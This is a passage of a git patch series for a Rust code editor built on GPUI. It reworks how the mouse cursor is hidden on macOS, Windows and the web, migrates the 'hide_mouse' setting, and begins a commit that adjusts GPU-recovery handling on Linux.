Arc::new(AtomicBool::new(false)), + cursor_visible: Arc::new(AtomicBool::new(true)), })) } @@ -621,10 +625,10 @@ impl Platform for MacPlatform { handle: AnyWindowHandle, options: WindowParams, ) -> Result> { - let (cursor_hidden, foreground_executor, background_executor, renderer_context) = { + let (cursor_visible, foreground_executor, background_executor, renderer_context) = { let guard = self.0.lock(); ( - guard.cursor_hidden.clone(), + guard.cursor_visible.clone(), guard.foreground_executor.clone(), guard.background_executor.clone(), guard.renderer_context.clone(), @@ -634,7 +638,7 @@ impl Platform for MacPlatform { Ok(Box::new(MacWindow::open( handle, options, - cursor_hidden, + cursor_visible, foreground_executor, background_executor, renderer_context, @@ -991,12 +995,25 @@ impl Platform for MacPlatform { /// Match cursor style to one of the styles available /// in macOS's [NSCursor](https://developer.apple.com/documentation/appkit/nscursor). fn set_cursor_style(&self, style: CursorStyle) { - let cursor_hidden = self.0.lock().cursor_hidden.clone(); unsafe { - set_active_window_cursor_style(style, &cursor_hidden); + set_active_window_cursor_style(style); + } + } + + fn hide_cursor_until_mouse_moves(&self) { + let cursor_visible = self.0.lock().cursor_visible.clone(); + if !cursor_visible.swap(false, Ordering::Relaxed) { + return; + } + unsafe { + let _: () = msg_send![class!(NSCursor), setHiddenUntilMouseMoves: YES]; } } + fn is_cursor_visible(&self) -> bool { + self.0.lock().cursor_visible.load(Ordering::Relaxed) + } + fn should_auto_hide_scrollbars(&self) -> bool { #[allow(non_upper_case_globals)] const NSScrollerStyleOverlay: NSInteger = 1; diff --git a/crates/gpui_macos/src/window.rs b/crates/gpui_macos/src/window.rs index 2ab4b52d8d8ace..8e7fcb154cf513 100644 --- a/crates/gpui_macos/src/window.rs +++ b/crates/gpui_macos/src/window.rs @@ -324,10 +324,7 @@ pub(crate) fn convert_mouse_position(position: NSPoint, window_height: Pixels) - /// This function is not thread safe. Callers must ensure this is called on the AppKit main /// thread because it reads the active AppKit window and updates GPUI window state associated /// with Objective-C objects. -pub(crate) unsafe fn set_active_window_cursor_style( - style: CursorStyle, - cursor_hidden: &AtomicBool, -) { +pub(crate) unsafe fn set_active_window_cursor_style(style: CursorStyle) { // SAFETY: The caller guarantees AppKit main-thread access. The class check ensures the // window has our WINDOW_STATE_IVAR before reading it. unsafe { @@ -345,9 +342,6 @@ pub(crate) unsafe fn set_active_window_cursor_style( }; let Some(active_window) = active_window else { - if !matches!(style, CursorStyle::None) { - unhide_cursor(cursor_hidden); - } return; }; @@ -363,22 +357,6 @@ pub(crate) unsafe fn set_active_window_cursor_style( } } -/// Unhides the cursor if this GPUI platform instance has hidden it. -/// -/// # Safety -/// -/// Must be called on the AppKit main thread. -unsafe fn unhide_cursor(cursor_hidden: &AtomicBool) { - unsafe { - if cursor_hidden - .compare_exchange(true, false, Ordering::Relaxed, Ordering::Relaxed) - .is_ok() - { - let _: () = msg_send![class!(NSCursor), unhide]; - } - } -} - unsafe fn build_window_class(name: &'static str, superclass: &Class) -> *const Class { unsafe { let mut decl = ClassDecl::new(name, superclass).unwrap(); @@ -496,7 +474,7 @@ struct MacWindowState { blurred_view: Option, background_appearance: WindowBackgroundAppearance, cursor_style: CursorStyle, - cursor_hidden: Arc, + cursor_visible: Arc, display_link: Option, renderer: renderer::Renderer, request_frame_callback: Option>, @@ -698,7 +676,7 @@ impl MacWindow { tabbing_identifier, .. }: WindowParams, - cursor_hidden: Arc, + cursor_visible: Arc, foreground_executor: ForegroundExecutor, background_executor: BackgroundExecutor, renderer_context: renderer::Context, @@ -816,7 +794,7 @@ impl MacWindow { blurred_view: None, background_appearance: WindowBackgroundAppearance::Opaque, cursor_style: CursorStyle::Arrow, - cursor_hidden, + cursor_visible, display_link: None, renderer: renderer::new_renderer( renderer_context, @@ -1850,26 +1828,7 @@ extern "C" fn reset_cursor_rects(this: &Object, _: Sel) { let _: () = msg_send![super(this, class!(NSView)), resetCursorRects]; let window_state = get_window_state(this); - let cursor_style; - let cursor_hidden; - - { - let window_state = window_state.lock(); - - if matches!(window_state.cursor_style, CursorStyle::None) { - if window_state - .cursor_hidden - .compare_exchange(false, true, Ordering::Relaxed, Ordering::Relaxed) - .is_ok() - { - let _: () = msg_send![class!(NSCursor), hide]; - } - return; - } - - cursor_style = window_state.cursor_style; - cursor_hidden = window_state.cursor_hidden.clone(); - }; + let cursor_style = window_state.lock().cursor_style; let cursor: id = match cursor_style { CursorStyle::Arrow => msg_send![class!(NSCursor), arrowCursor], @@ -1905,11 +1864,8 @@ extern "C" fn reset_cursor_rects(this: &Object, _: Sel) { CursorStyle::DragLink => msg_send![class!(NSCursor), dragLinkCursor], CursorStyle::DragCopy => msg_send![class!(NSCursor), dragCopyCursor], CursorStyle::ContextualMenu => msg_send![class!(NSCursor), contextualMenuCursor], - CursorStyle::None => unreachable!(), }; - unhide_cursor(&cursor_hidden); - let bounds = NSView::bounds(this as *const Object as id); let _: () = msg_send![this, addCursorRect: bounds cursor: cursor]; } @@ -2140,6 +2096,20 @@ extern "C" fn handle_view_event(this: &Object, _: Sel, native_event: id) { let event = unsafe { platform_input_from_native(native_event, Some(window_height)) }; if let Some(mut event) = event { + // AppKit unhides the cursor on the next mouse movement; mirror that here. + if matches!( + event, + PlatformInput::MouseMove(_) + | PlatformInput::MouseDown(_) + | PlatformInput::MouseUp(_) + | PlatformInput::MousePressure(_) + | PlatformInput::MouseExited(_) + | PlatformInput::ScrollWheel(_) + | PlatformInput::Pinch(_) + ) { + lock.cursor_visible.store(true, Ordering::Relaxed); + } + match &mut event { PlatformInput::MouseDown( event @ MouseDownEvent { @@ -2365,6 +2335,9 @@ extern "C" fn window_did_change_key_status(this: &Object, selector: Sel, _: id) let lock = window_state.lock(); let is_active = unsafe { lock.native_window.isKeyWindow() == YES }; + // AppKit also unhides the cursor on activation changes, so mirror that here. + lock.cursor_visible.store(true, Ordering::Relaxed); + // When opening a pop-up while the application isn't active, Cocoa sends a spurious // `windowDidBecomeKey` message to the previous key window even though that window // isn't actually key. This causes a bug if the application is later activated while diff --git a/crates/gpui_macros/src/styles.rs b/crates/gpui_macros/src/styles.rs index 133c9fdebec06b..fdbc64f623a474 100644 --- a/crates/gpui_macros/src/styles.rs +++ b/crates/gpui_macros/src/styles.rs @@ -327,12 +327,6 @@ pub fn cursor_style_methods(input: TokenStream) -> TokenStream { self } - /// Sets cursor style when hovering over an element to `none`. - /// [Docs](https://tailwindcss.com/docs/cursor) - #visibility fn cursor_none(mut self, cursor: CursorStyle) -> Self { - self.style().mouse_cursor = Some(gpui::CursorStyle::None); - self - } }; output.into() diff --git a/crates/gpui_web/src/platform.rs b/crates/gpui_web/src/platform.rs index 4d78b71aa05b74..290ef33e5f1faa 100644 --- a/crates/gpui_web/src/platform.rs +++ b/crates/gpui_web/src/platform.rs @@ -13,11 +13,12 @@ use gpui::{ use gpui_wgpu::WgpuContext; use std::{ borrow::Cow, - cell::RefCell, + cell::{Cell, RefCell}, path::{Path, PathBuf}, rc::Rc, sync::Arc, }; +use wasm_bindgen::prelude::*; static BUNDLED_FONTS: &[&[u8]] = &[ include_bytes!("../../../assets/fonts/ibm-plex-sans/IBMPlexSans-Regular.ttf"), @@ -39,6 +40,9 @@ pub struct WebPlatform { active_display: Rc, callbacks: RefCell, wgpu_context: Rc>>, + cursor_visible: Rc>, + last_cursor_css: Rc>, + _cursor_restore_listeners: Vec, } #[derive(Default)] @@ -77,6 +81,14 @@ impl WebPlatform { let active_display: Rc = Rc::new(WebDisplay::new(browser_window.clone())); + let cursor_visible = Rc::new(Cell::new(true)); + let last_cursor_css = Rc::new(Cell::new("default")); + let cursor_restore_listeners = cursor_restore_listeners( + &browser_window, + cursor_visible.clone(), + last_cursor_css.clone(), + ); + Self { browser_window, background_executor, @@ -86,6 +98,9 @@ impl WebPlatform { active_display, callbacks: RefCell::new(WebPlatformCallbacks::default()), wgpu_context: Rc::new(RefCell::new(None)), + cursor_visible, + last_cursor_css, + _cursor_restore_listeners: cursor_restore_listeners, } } } @@ -292,18 +307,25 @@ impl Platform for WebPlatform { CursorStyle::DragLink => "alias", CursorStyle::DragCopy => "copy", CursorStyle::ContextualMenu => "context-menu", - CursorStyle::None => "none", }; - if let Some(document) = self.browser_window.document() { - if let Some(body) = document.body() { - if let Err(error) = body.style().set_property("cursor", css_cursor) { - log::warn!("Failed to set cursor style: {error:?}"); - } - } + self.last_cursor_css.set(css_cursor); + if self.cursor_visible.get() { + set_body_cursor(&self.browser_window, css_cursor); } } + fn hide_cursor_until_mouse_moves(&self) { + if !self.cursor_visible.replace(false) { + return; + } + set_body_cursor(&self.browser_window, "none"); + } + + fn is_cursor_visible(&self) -> bool { + self.cursor_visible.get() + } + fn should_auto_hide_scrollbars(&self) -> bool { true } @@ -342,3 +364,72 @@ impl Platform for WebPlatform { self.callbacks.borrow_mut().keyboard_layout_change = Some(callback); } } + +struct EventListenerHandle { + target: web_sys::EventTarget, + event_name: &'static str, + closure: Closure, +} + +impl Drop for EventListenerHandle { + fn drop(&mut self) { + self.target + .remove_event_listener_with_callback( + self.event_name, + self.closure.as_ref().unchecked_ref(), + ) + .ok(); + } +} + +fn cursor_restore_listeners( + browser_window: &web_sys::Window, + cursor_visible: Rc>, + last_cursor_css: Rc>, +) -> Vec { + let mut handles = Vec::new(); + let Some(document) = browser_window.document() else { + return handles; + }; + + let make_restore_handler = |browser_window: web_sys::Window| { + let cursor_visible = cursor_visible.clone(); + let last_cursor_css = last_cursor_css.clone(); + Closure::::new(move |_event: JsValue| { + if !cursor_visible.replace(true) { + set_body_cursor(&browser_window, last_cursor_css.get()); + } + }) + }; + + let mut add_listener = |target: &web_sys::EventTarget, event_name: &'static str| { + let closure = make_restore_handler(browser_window.clone()); + target + .add_event_listener_with_callback(event_name, closure.as_ref().unchecked_ref()) + .ok(); + handles.push(EventListenerHandle { + target: target.clone(), + event_name, + closure, + }); + }; + + let document_target: &web_sys::EventTarget = document.as_ref(); + let window_target: &web_sys::EventTarget = browser_window.as_ref(); + + add_listener(document_target, "mousemove"); + add_listener(document_target, "mouseenter"); + add_listener(window_target, "blur"); + add_listener(document_target, "visibilitychange"); + + handles +} + +fn set_body_cursor(browser_window: &web_sys::Window, css_cursor: &str) { + if let Some(document) = browser_window.document() + && let Some(body) = document.body() + && let Err(error) = body.style().set_property("cursor", css_cursor) + { + log::warn!("Failed to set cursor style: {error:?}"); + } +} diff --git a/crates/gpui_windows/src/events.rs b/crates/gpui_windows/src/events.rs index 23b0c078b8ae62..370582e83b5a5f 100644 --- a/crates/gpui_windows/src/events.rs +++ b/crates/gpui_windows/src/events.rs @@ -1,4 +1,4 @@ -use std::rc::Rc; +use std::{rc::Rc, sync::atomic::Ordering}; use ::util::ResultExt; use anyhow::Context as _; @@ -297,6 +297,7 @@ impl WindowsWindowInner { fn handle_mouse_move_msg(&self, handle: HWND, lparam: LPARAM, wparam: WPARAM) -> Option { self.start_tracking_mouse(handle, TME_LEAVE); + self.restore_cursor_after_hide(); let Some(mut func) = self.state.callbacks.input.take() else { return Some(1); @@ -330,6 +331,9 @@ impl WindowsWindowInner { fn handle_mouse_leave_msg(&self) -> Option { self.state.hovered.set(false); + // The next window's `WM_SETCURSOR` picks its own cursor, so we just clear + // the flag for tight `is_cursor_visible()` semantics. + self.state.cursor_visible.store(true, Ordering::Relaxed); if let Some(mut callback) = self.state.callbacks.hovered_status_change.take() { callback(false); self.state @@ -726,6 +730,10 @@ impl WindowsWindowInner { let activated = wparam.loword() > 0; let this = self.clone(); + if !activated { + this.state.cursor_visible.store(true, Ordering::Relaxed); + } + // When the window is activated (gains focus), reset the modifier tracking state. // This fixes the issue where Alt-Tab away and back leaves stale modifier state // (especially the Alt key) because Windows doesn't always send key-up events to @@ -915,6 +923,7 @@ impl WindowsWindowInner { fn handle_nc_mouse_move_msg(&self, handle: HWND, lparam: LPARAM) -> Option { self.start_tracking_mouse(handle, TME_LEAVE | TME_NONCLIENT); + self.restore_cursor_after_hide(); let mut func = self.state.callbacks.input.take()?; let scale_factor = self.state.scale_factor.get(); @@ -1078,8 +1087,13 @@ impl WindowsWindowInner { { return None; } + let cursor = if self.state.cursor_visible.load(Ordering::Relaxed) { + self.state.current_cursor.get() + } else { + None + }; unsafe { - SetCursor(self.state.current_cursor.get()); + SetCursor(cursor); }; Some(0) } @@ -1233,6 +1247,15 @@ impl WindowsWindowInner { } } + /// Clear the hidden flag and restore the cursor immediately + fn restore_cursor_after_hide(&self) { + if !self.state.cursor_visible.swap(true, Ordering::Relaxed) { + unsafe { + SetCursor(self.state.current_cursor.get()); + } + } + } + fn start_tracking_mouse(&self, handle: HWND, flags: TRACKMOUSEEVENT_FLAGS) { if !self.state.hovered.get() { self.state.hovered.set(true); diff --git a/crates/gpui_windows/src/platform.rs b/crates/gpui_windows/src/platform.rs index 4c2898256212a7..7b76c4d12a8980 100644 --- a/crates/gpui_windows/src/platform.rs +++ b/crates/gpui_windows/src/platform.rs @@ -63,6 +63,8 @@ pub(crate) struct WindowsPlatformState { jump_list: RefCell, // NOTE: standard cursor handles don't need to close. pub(crate) current_cursor: Cell>, + /// Shared with each window so `WM_SETCURSOR` can read it directly. + pub(crate) cursor_visible: Arc, directx_devices: RefCell>, } @@ -87,6 +89,7 @@ impl WindowsPlatformState { callbacks, jump_list: RefCell::new(jump_list), current_cursor: Cell::new(current_cursor), + cursor_visible: Arc::new(AtomicBool::new(true)), directx_devices: RefCell::new(directx_devices), menus: RefCell::new(Vec::new()), } @@ -219,6 +222,7 @@ impl WindowsPlatform { icon: self.icon, executor: self.foreground_executor.clone(), current_cursor: self.inner.state.current_cursor.get(), + cursor_visible: self.inner.state.cursor_visible.clone(), drop_target_helper: self.drop_target_helper.clone().unwrap(), validation_number: self.inner.validation_number, main_receiver: self.inner.main_receiver.clone(), @@ -682,6 +686,31 @@ impl Platform for WindowsPlatform { } } + fn hide_cursor_until_mouse_moves(&self) { + if !self + .inner + .state + .cursor_visible + .swap(false, Ordering::Relaxed) + { + return; + } + + for handle in self.raw_window_handles.read().iter() { + let Some(window) = window_from_hwnd(handle.as_raw()) else { + continue; + }; + if window.state.hovered.get() { + unsafe { SetCursor(None) }; + break; + } + } + } + + fn is_cursor_visible(&self) -> bool { + self.inner.state.cursor_visible.load(Ordering::Relaxed) + } + fn should_auto_hide_scrollbars(&self) -> bool { should_auto_hide_scrollbars().log_err().unwrap_or(false) } @@ -1015,6 +1044,7 @@ pub(crate) struct WindowCreationInfo { pub(crate) icon: HICON, pub(crate) executor: ForegroundExecutor, pub(crate) current_cursor: Option, + pub(crate) cursor_visible: Arc, pub(crate) drop_target_helper: IDropTargetHelper, pub(crate) validation_number: usize, pub(crate) main_receiver: PriorityQueueReceiver, diff --git a/crates/gpui_windows/src/util.rs b/crates/gpui_windows/src/util.rs index fe5093dede385c..15dd4c69984d14 100644 --- a/crates/gpui_windows/src/util.rs +++ b/crates/gpui_windows/src/util.rs @@ -115,7 +115,6 @@ pub(crate) fn load_cursor(style: CursorStyle) -> Option { CursorStyle::ResizeUpLeftDownRight => (&SIZENWSE, IDC_SIZENWSE), CursorStyle::ResizeUpRightDownLeft => (&SIZENESW, IDC_SIZENESW), CursorStyle::OperationNotAllowed => (&NO, IDC_NO), - CursorStyle::None => return None, _ => (&ARROW, IDC_ARROW), }; Some( diff --git a/crates/gpui_windows/src/window.rs b/crates/gpui_windows/src/window.rs index f655c1989e2c69..2fd7c3c6461dd5 100644 --- a/crates/gpui_windows/src/window.rs +++ b/crates/gpui_windows/src/window.rs @@ -66,6 +66,8 @@ pub struct WindowsWindowState { pub click_state: ClickState, pub current_cursor: Cell>, + /// Shared with [`WindowsPlatformState::cursor_visible`]. + pub cursor_visible: Arc, pub nc_button_pressed: Cell>, pub display: Cell, @@ -98,6 +100,7 @@ impl WindowsWindowState { directx_devices: &DirectXDevices, window_params: &CREATESTRUCTW, current_cursor: Option, + cursor_visible: Arc, display: WindowsDisplay, min_size: Option>, appearance: WindowAppearance, @@ -158,6 +161,7 @@ impl WindowsWindowState { renderer: RefCell::new(renderer), click_state, current_cursor: Cell::new(current_cursor), + cursor_visible, nc_button_pressed: Cell::new(nc_button_pressed), display: Cell::new(display), fullscreen: Cell::new(fullscreen), @@ -234,6 +238,7 @@ impl WindowsWindowInner { &context.directx_devices, cs, context.current_cursor, + context.cursor_visible.clone(), context.display, context.min_size, context.appearance, @@ -373,6 +378,7 @@ struct WindowCreateContext { min_size: Option>, executor: ForegroundExecutor, current_cursor: Option, + cursor_visible: Arc, drop_target_helper: IDropTargetHelper, validation_number: usize, main_receiver: PriorityQueueReceiver, @@ -394,6 +400,7 @@ impl WindowsWindow { icon, executor, current_cursor, + cursor_visible, drop_target_helper, validation_number, main_receiver, @@ -473,6 +480,7 @@ impl WindowsWindow { min_size: params.window_min_size, executor, current_cursor, + cursor_visible, drop_target_helper, validation_number, main_receiver, diff --git a/crates/migrator/src/migrations.rs b/crates/migrator/src/migrations.rs index 8fa8907a16cc48..394b26f57ab3f0 100644 --- a/crates/migrator/src/migrations.rs +++ b/crates/migrator/src/migrations.rs @@ -358,3 +358,9 @@ pub(crate) mod m_2026_04_17 { pub(crate) use settings::promote_show_branch_icon_true_to_show_branch_status_icon; } + +pub(crate) mod m_2026_05_04 { + mod settings; + + pub(crate) use settings::SETTINGS_PATTERNS; +} diff --git a/crates/migrator/src/migrations/m_2026_05_04/settings.rs b/crates/migrator/src/migrations/m_2026_05_04/settings.rs new file mode 100644 index 00000000000000..a2a705e03f42e7 --- /dev/null +++ b/crates/migrator/src/migrations/m_2026_05_04/settings.rs @@ -0,0 +1,38 @@ +use std::ops::Range; +use tree_sitter::{Query, QueryMatch}; + +use crate::MigrationPatterns; +use crate::patterns::SETTINGS_ROOT_KEY_VALUE_PATTERN; + +pub const SETTINGS_PATTERNS: MigrationPatterns = + &[(SETTINGS_ROOT_KEY_VALUE_PATTERN, replace_setting_value)]; + +fn replace_setting_value( + contents: &str, + mat: &QueryMatch, + query: &Query, +) -> Option<(Range, String)> { + let setting_capture_ix = query.capture_index_for_name("name")?; + let setting_name_range = mat + .nodes_for_capture_index(setting_capture_ix) + .next()? + .byte_range(); + let setting_name = contents.get(setting_name_range)?; + + if setting_name != "hide_mouse" { + return None; + } + + let value_capture_ix = query.capture_index_for_name("value")?; + let value_range = mat + .nodes_for_capture_index(value_capture_ix) + .next()? + .byte_range(); + let value = contents.get(value_range.clone())?; + + if value.trim() != "\"on_typing_and_movement\"" { + return None; + } + + Some((value_range, "\"on_typing_and_action\"".to_string())) +} diff --git a/crates/migrator/src/migrator.rs b/crates/migrator/src/migrator.rs index ac7e4e337ed946..e1b15d98ea528d 100644 --- a/crates/migrator/src/migrator.rs +++ b/crates/migrator/src/migrator.rs @@ -253,6 +253,10 @@ pub fn migrate_settings(text: &str) -> Result> { MigrationType::Json( migrations::m_2026_04_17::promote_show_branch_icon_true_to_show_branch_status_icon, ), + MigrationType::TreeSitter( + migrations::m_2026_05_04::SETTINGS_PATTERNS, + &SETTINGS_QUERY_2026_05_04, + ), ]; run_migrations(text, migrations) } @@ -395,6 +399,10 @@ define_query!( KEYMAP_QUERY_2026_03_23, migrations::m_2026_03_23::KEYMAP_PATTERNS ); +define_query!( + SETTINGS_QUERY_2026_05_04, + migrations::m_2026_05_04::SETTINGS_PATTERNS +); // custom query static EDIT_PREDICTION_SETTINGS_MIGRATION_QUERY: LazyLock = LazyLock::new(|| { @@ -5346,6 +5354,42 @@ mod tests { ); } + #[test] + fn test_rename_hide_mouse_on_typing_and_movement_to_on_typing_and_action() { + assert_migrate_settings( + r#" + { + "hide_mouse": "on_typing_and_movement" + } + "#, + Some( + r#" + { + "hide_mouse": "on_typing_and_action" + } + "#, + ), + ); + } + + #[test] + fn test_chain_hide_mouse_while_typing_to_on_typing_and_action() { + assert_migrate_settings( + r#" + { + "hide_mouse_while_typing": true + } + "#, + Some( + r#" + { + "hide_mouse": "on_typing_and_action" + } + "#, + ), + ); + } + #[test] fn test_promote_show_branch_icon_true_to_show_branch_status_icon_no_change_when_already_migrated() { diff --git a/crates/settings/src/vscode_import.rs b/crates/settings/src/vscode_import.rs index 64f00bc5d6501b..db7f847b23417f 100644 --- a/crates/settings/src/vscode_import.rs +++ b/crates/settings/src/vscode_import.rs @@ -192,6 +192,7 @@ impl VsCodeSettings { ..GlobalLspSettingsContent::default() }), helix_mode: None, + hide_mouse: None, image_viewer: None, journal: None, language_models: None, @@ -267,7 +268,6 @@ impl VsCodeSettings { go_to_definition_fallback: None, go_to_definition_scroll_strategy: None, gutter: self.gutter_content(), - hide_mouse: None, horizontal_scroll_margin: None, hover_popover_delay: self.read_u64("editor.hover.delay").map(Into::into), hover_popover_enabled: self.read_bool("editor.hover.enabled"), diff --git a/crates/settings_content/src/editor.rs b/crates/settings_content/src/editor.rs index 5c0dd939688326..6a36d0c524a6f7 100644 --- a/crates/settings_content/src/editor.rs +++ b/crates/settings_content/src/editor.rs @@ -22,10 +22,6 @@ pub struct EditorSettingsContent { /// /// Default: bar pub cursor_shape: Option, - /// Determines when the mouse cursor should be hidden in an editor or input box. - /// - /// Default: on_typing_and_movement - pub hide_mouse: Option, /// Determines how snippets are sorted relative to other completion items. /// /// Default: inline @@ -836,34 +832,6 @@ pub enum GoToDefinitionScrollStrategy { Preserve, } -/// Determines when the mouse cursor should be hidden in an editor or input box. -/// -/// Default: on_typing_and_movement -#[derive( - Copy, - Clone, - Debug, - Default, - Serialize, - Deserialize, - PartialEq, - Eq, - JsonSchema, - MergeFrom, - strum::VariantArray, - strum::VariantNames, -)] -#[serde(rename_all = "snake_case")] -pub enum HideMouseMode { - /// Never hide the mouse cursor - Never, - /// Hide only when typing - OnTyping, - /// Hide on both typing and cursor movement - #[default] - OnTypingAndMovement, -} - /// Determines how snippets are sorted relative to other completion items. /// /// Default: inline diff --git a/crates/settings_content/src/settings_content.rs b/crates/settings_content/src/settings_content.rs index 251718d146506f..02fe409c6325af 100644 --- a/crates/settings_content/src/settings_content.rs +++ b/crates/settings_content/src/settings_content.rs @@ -82,6 +82,35 @@ pub enum ParseStatus { Failed { error: String }, } +/// Determines when the mouse cursor should be hidden in response to keyboard +/// input. +/// +/// Default: on_typing_and_action +#[derive( + Copy, + Clone, + Debug, + Default, + Serialize, + Deserialize, + PartialEq, + Eq, + JsonSchema, + MergeFrom, + strum::VariantArray, + strum::VariantNames, +)] +#[serde(rename_all = "snake_case")] +pub enum HideMouseMode { + /// Never hide the mouse cursor + Never, + /// Hide only when typing + OnTyping, + /// Hide on typing and on key bindings that resolve to an action + #[default] + OnTypingAndAction, +} + #[with_fallible_options] #[derive(Debug, PartialEq, Default, Clone, Serialize, Deserialize, JsonSchema, MergeFrom)] pub struct SettingsContent { @@ -156,6 +185,13 @@ pub struct SettingsContent { /// Default: false pub helix_mode: Option, + /// Determines when the mouse cursor should be hidden in response to + /// keyboard input. Applies globally across all input surfaces (editors, + /// terminals, palettes, etc.). + /// + /// Default: on_typing_and_action + pub hide_mouse: Option, + pub journal: Option, /// A map of log scopes to the desired log level. diff --git a/crates/settings_ui/src/page_data.rs b/crates/settings_ui/src/page_data.rs index a43c566d1a7524..ce0c53b3822e26 100644 --- a/crates/settings_ui/src/page_data.rs +++ b/crates/settings_ui/src/page_data.rs @@ -1145,9 +1145,9 @@ fn appearance_page() -> SettingsPage { description: "When to hide the mouse cursor.", field: Box::new(SettingField { json_path: Some("hide_mouse"), - pick: |settings_content| settings_content.editor.hide_mouse.as_ref(), + pick: |settings_content| settings_content.hide_mouse.as_ref(), write: |settings_content, value, _| { - settings_content.editor.hide_mouse = value; + settings_content.hide_mouse = value; }, }), metadata: None, diff --git a/crates/vim/src/helix.rs b/crates/vim/src/helix.rs index eebad4d4382b70..d61b0547aef5ce 100644 --- a/crates/vim/src/helix.rs +++ b/crates/vim/src/helix.rs @@ -7,8 +7,8 @@ mod surround; use editor::display_map::{DisplayRow, DisplaySnapshot}; use editor::{ - DisplayPoint, Editor, EditorSettings, HideMouseCursorOrigin, MultiBufferOffset, - NavigationOverlayLabel, NavigationTargetOverlay, SelectionEffects, ToOffset, ToPoint, movement, + DisplayPoint, Editor, EditorSettings, MultiBufferOffset, NavigationOverlayLabel, + NavigationTargetOverlay, SelectionEffects, ToOffset, ToPoint, movement, }; use gpui::actions; use gpui::{App, Context, Font, Hsla, Pixels, Window, WindowTextSystem}; @@ -807,7 +807,6 @@ impl Vim { ) { let count = Vim::take_count(cx).unwrap_or(1); self.update_editor(cx, |_, editor, cx| { - editor.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); let display_map = editor.display_map.update(cx, |map, cx| map.snapshot(cx)); let mut selections = editor.selections.all::(&display_map); let max_point = display_map.buffer_snapshot().max_point(); diff --git a/crates/vim/src/vim.rs b/crates/vim/src/vim.rs index a76846fd33dd89..6c0c3d0201b490 100644 --- a/crates/vim/src/vim.rs +++ b/crates/vim/src/vim.rs @@ -22,8 +22,8 @@ mod visual; use crate::normal::paste::Paste as VimPaste; use collections::HashMap; use editor::{ - Anchor, Bias, Editor, EditorEvent, EditorSettings, HideMouseCursorOrigin, MultiBufferOffset, - NavigationOverlayKey, NavigationTargetOverlay, SelectionEffects, + Anchor, Bias, Editor, EditorEvent, EditorSettings, MultiBufferOffset, NavigationOverlayKey, + NavigationTargetOverlay, SelectionEffects, actions::Paste, display_map::ToDisplayPoint, movement::{self, FindRange}, @@ -1089,10 +1089,6 @@ impl Vim { if let Some(action) = keystroke_event.action.as_ref() { // Keystroke is handled by the vim system, so continue forward if action.name().starts_with("vim::") { - self.update_editor(cx, |_, editor, cx| { - editor.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx) - }); - return; } } else if window.has_pending_keystrokes() || keystroke_event.keystroke.is_ime_in_progress() diff --git a/crates/zed/src/zed.rs b/crates/zed/src/zed.rs index 9461c89b7ad680..e9da59396092a6 100644 --- a/crates/zed/src/zed.rs +++ b/crates/zed/src/zed.rs @@ -382,6 +382,8 @@ pub fn initialize_workspace(app_state: Arc, cx: &mut App) { }) .detach(); + init_cursor_hide_mode(cx); + cx.observe_new(|_multi_workspace: &mut MultiWorkspace, window, cx| { let Some(window) = window else { return; @@ -1852,6 +1854,25 @@ fn notify_settings_errors(result: settings::SettingsParseResult, is_user: bool, }; } +#[derive(Copy, Clone, Debug, settings::RegisterSetting)] +struct CursorHideModeSetting(gpui::CursorHideMode); + +impl Settings for CursorHideModeSetting { + fn from_settings(content: &settings::SettingsContent) -> Self { + Self(match content.hide_mouse.unwrap_or_default() { + settings::HideMouseMode::Never => gpui::CursorHideMode::Never, + settings::HideMouseMode::OnTyping => gpui::CursorHideMode::OnTyping, + settings::HideMouseMode::OnTypingAndAction => gpui::CursorHideMode::OnTypingAndAction, + }) + } +} + +fn init_cursor_hide_mode(cx: &mut App) { + let apply = |cx: &mut App| cx.set_cursor_hide_mode(CursorHideModeSetting::get_global(cx).0); + apply(cx); + cx.observe_global::(apply).detach(); +} + pub fn watch_settings_files(fs: Arc, cx: &mut App) { MigrationNotification::set_global(cx.new(|_| MigrationNotification), cx); diff --git a/docs/src/reference/all-settings.md b/docs/src/reference/all-settings.md index eb4ccd1259ea4e..bc20f1cf57ae44 100644 --- a/docs/src/reference/all-settings.md +++ b/docs/src/reference/all-settings.md @@ -801,9 +801,8 @@ List of `string` values ## Hide Mouse -- Description: Determines when the mouse cursor should be hidden in an editor or input box. -- Setting: `hide_mouse` -- Default: `on_typing_and_movement` +- Description: Determines when the mouse cursor should be hidden in response to keyboard input. +- Default: `on_typing_and_action` **Options** @@ -823,11 +822,11 @@ List of `string` values } ``` -3. Hide on both typing and cursor movement: +3. Hide on typing and on key bindings that resolve to an action: ```json [settings] { - "hide_mouse": "on_typing_and_movement" + "hide_mouse": "on_typing_and_action" } ``` diff --git a/docs/src/visual-customization.md b/docs/src/visual-customization.md index 6140475eb71294..7c5b9f000e66ff 100644 --- a/docs/src/visual-customization.md +++ b/docs/src/visual-customization.md @@ -183,8 +183,8 @@ TBD: Centered layout related settings // Highlight the current line in the editor: none, gutter, line, all "current_line_highlight": "all", - // When does the mouse cursor hide: never, on_typing, on_typing_and_movement - "hide_mouse": "on_typing_and_movement", + // When does the mouse cursor hide: never, on_typing, on_typing_and_action + "hide_mouse": "on_typing_and_action", // Whether to highlight all occurrences of the selected text in an editor. "selection_highlight": true, From 8a4c6374aa8220b60e92036f2cc8adf76ed961a2 Mon Sep 17 00:00:00 2001 From: Conrad Irwin Date: Mon, 4 May 2026 20:24:23 -0600 Subject: [PATCH 177/231] Try to reduce linux wGPU crashes better (#55343) Updates #54349 There were two problems: * The crash never happened, instead we'd always retry. * When re-trying it seemed like we were picking llvmpipe. Claude's suggestion was that immediately after wake, the real GPU isn't yet awake, and so we pick llvm. Avoid this by disallowing llvmpipe on retry Release Notes: - linux: Reduced crash rate when recovering GPUs --- crates/gpui_linux/src/linux/wayland/window.rs | 15 +++--- crates/gpui_linux/src/linux/x11/window.rs | 15 +++--- crates/gpui_wgpu/src/wgpu_context.rs | 47 ++++++++++++++++--- crates/gpui_wgpu/src/wgpu_renderer.rs | 15 ++++-- 4 files changed, 63 insertions(+), 29 deletions(-) diff --git a/crates/gpui_linux/src/linux/wayland/window.rs b/crates/gpui_linux/src/linux/wayland/window.rs index 5d53496c057f1a..857289a1d9708a 100644 --- a/crates/gpui_linux/src/linux/wayland/window.rs +++ b/crates/gpui_linux/src/linux/wayland/window.rs @@ -1387,16 +1387,13 @@ impl PlatformWindow for WaylandWindow { .display_ptr() .cast::(), }; - state.renderer.recover(&raw_window).unwrap_or_else(|err| { - panic!( - "GPU device lost and recovery failed. \ - This may happen after system suspend/resume. \ - Please restart the application.\n\nError: {err}" - ) - }); + match state.renderer.recover(&raw_window) { + Ok(()) => 